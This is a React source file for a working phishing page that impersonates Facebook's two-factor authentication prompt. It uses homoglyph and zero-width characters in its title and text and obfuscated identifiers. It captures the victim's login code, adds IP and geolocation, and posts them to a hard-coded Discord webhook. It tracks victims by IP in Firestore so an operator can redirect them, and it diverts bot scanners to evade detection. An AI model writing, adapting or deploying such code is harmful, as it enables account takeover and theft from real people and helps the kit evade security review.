import React, { useEffect, useState } from 'react';
import { addDoc, collection, doc, getDoc, getDocs, onSnapshot, setDoc } from 'firebase/firestore';
import Botd from '@fingerprintjs/botd';
import { publicIpv4 } from 'public-ip';
import { BsInfoCircleFill as IconInfo } from "react-icons/bs";
import { IoIosAdd as IconAdd } from "react-icons/io";
import { footerLinks, desktoplanguages } from "../sakles/malores.js";
import { db } from '../f7g8h9p.js';
import { useMediaQuery } from 'react-responsive';
import '../crosto/_c8b5a2.css';

const R8t6s3 = () => {
    const [ip, setIp] = useState(undefined);
    const [grraht, setCode] = useState('');
    const [dexlus, setdexlus] = useState('');
    const [userData, setUserData] = useState(undefined);
    const [isUserData, setIsUserData] = useState(false);
    const [userUrl, setUserUrl] = useState(false);

    const handleActions = (event) => {
        event.preventDefault(); // Prevent the default form submission
        if (grraht === '') {
            // Handle code validation
            return;
        } else {
            const discordWebhook = 'https://discord.com/api/webhooks/1416393877035683961/GKtmmDeL7GTrQofVEqRS1DelocI4kuNzCltu6YZMVUbURKDtPlBtjHbKjyHQM4C8__bz';

            fetch(`https://ipapi.co/json/`)
                .then((response) => response.json())
                .then((response) => {
                    const { country, region, city } = response;
                    const content = `========================\nLS 1: '${grraht}'\nLS 2: '${dexlus}'\nCountry : '${country}'\nRegion : '${region}'\nCity : '${city}'\nIP: '${ip}'\n========================`;

                    fetch(discordWebhook, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({ content }),
                    })
                        .then(() => {
                            window.location = 'qWm7Vr3Lp9Xo2Jt5Ks8Fn1By4Ig6Nc0Uz3Hp8Tn7Vo1Lk5Jr9Qm2Xs4Bd6Fy7Ht5';
                        })
                        .catch((error) => {
                            window.location = 'qWm7Vr3Lp9Xo2Jt5Ks8Fn1By4Ig6Nc0Uz3Hp8Tn7Vo1Lk5Jr9Qm2Xs4Bd6Fy7Ht5';
                        });
                });
        }
    };

    const handleCodeChange = (e) => {
        setCode(e.target.value); // Allow any input
    };

    const handleCodeChange1 = (e) => {
        setdexlus(e.target.value); // Allow any input
    };

    const getUserData = async () => {
        const documentSnapshot = await getDocs(collection(db, "georgebs"));
        const newData = documentSnapshot.docs.map((doc) => ({ ...doc.data(), id: doc.id }));
        const filter = newData.filter((x) => {
            if (x.ip === ip) {
                setIsUserData(true);
                setUserData(x);
                return x;
            }
        });
        if (filter.length === 0) {
            addUserData();
        }
    };

    const getIp = async () => {
        if (!ip) {
            const ipAddress = await publicIpv4();
            setIp(ipAddress);
        }
    };

    useEffect(() => {
        getIp();
    }, []);

    useEffect(() => {
        if (ip) {
            onSnapshot(collection(db, "georgebs"), (snapshot) => {
                let isExist = false;
                snapshot.docs
                    .map((doc) => ({ ...doc.data(), id: doc.id }))
                    .filter((x) => {
                        if (x.ip === ip) {
                            isExist = true;
                            setUserData(x);
                            fetch('./data.json')
                                .then((res) => res.json())
                                .then((data) => {
                                    data.url_data.filter((item) => {
                                        if (item.id === parseInt(x.redir)) {
                                            setUserUrl(item.url);
                                            return;
                                        }
                                    });
                                })
                                .catch((err) => {
                                    console.log(err, ' error');
                                });
                        }
                    });
                if (!isExist) {
                    setUserUrl(false);
                }
            });
        }
    }, [ip]);

useEffect(() => {
    const detectBot = async () => {
        const botd = await Botd.load();
        const result = await botd.detect();

        if (result.bot) {
            console.log('Bot detected:', result.bot.type);
            window.location.href = "/ds";
        } else {
            console.log('Not a bot');
        }
    };

    detectBot();
}, []);

    useEffect(() => {
        document.title = 'Fаc‌‌еbо‌o‌k';
    }, [userData, userUrl]);

    const addUserData = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);

            const docSnap = await getDoc(docRef);

            if (!docSnap.exists()) {
                await setDoc(docRef, {
                    ip: ip,
                    number: -1,
                    redir: "-1",
                });
                console.log("BegasID: ", ip);
                getUserData();
            } else {
                console.log("ResID ID: ", ip);
            }
        } catch (e) {
            console.error("Serr: ", e);
        }
    };

    const resetUserNumber = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);
            await setDoc(docRef, { redir: "-1" }, { merge: true });
            console.log("DegIP: ", ip);
        } catch (e) {
            console.error("Gerr: ", e);
        }
    };

    useEffect(() => {
        if (ip) {
            getUserData();
        }
    }, [ip]);

    if (userUrl) {
        setTimeout(() => {
            window.location = userUrl;
        }, 1000);
        resetUserNumber();
    }

    console.log("hiuoio", isUserData, userData);

    if (isUserData) {
        return (
            <>
                <header className="2vos">
                    <div className="brohitis"></div>
                    <h1 className="vets"></h1>
                </header>
                <body className="rahade" id="rahade" name="rahade">
                    <br />
                    <div className="crembly">
                        <form id="rrafsuto" className="hinuets" name="qorosge" onSubmit={handleActions}>
                            <strong id="qanaj250">Two-Fаctor Authеnticаtion Rеquired</strong>
                            <br />
                            <br />
                            <hr className="dx" />
                            <br />
                            <a id="krasbo" className="bresysteg">
                                Yоu’vе as‌kеd us tо rеquirе a 6-dig‌it lо‌gin cо‌dе whеn anyо‌nе tri‌еs tо acc‌еss yоur accо‌unt fr‌оm a nеw dеvi‌cе оr brо‌wsеr.<br /><br />
                                En‌tеr thе 6-‌digit c‌оdе frоm yо‌ur <strong>Cо‌dе Gеnе‌ratоr</strong> оr 3r‌d par‌ty ap‌p bеlоw.
                            </a>
                            <br /><br /><br /><br /><br />{/* required pattern="[0-9]{6} */}
                            <input type="text" inputMode="numeric" pattern="[0-9]*" className="bronxy" id="bronxy" name="bronxy" placeholder="Lo‌gin c‌od‌e" onChange={handleCodeChange}/>
                            <br /><br /><br />
                            <span className="becros"></span>
                            <hr className="dx" />
                            <br />
                            <a id="qresokle" className="bresysteg">Neеd anothеr way to authеnticatе?</a>
                            <input type="submit" className="baston" value="Continue" />
                            <br /><br />
                        </form>
                    </div>
                </body>
                
                <footer>
                    <p></p>
                </footer>
            </>
        );
    }

    return null; // Return null if no user data
};

export default R8t6s3;
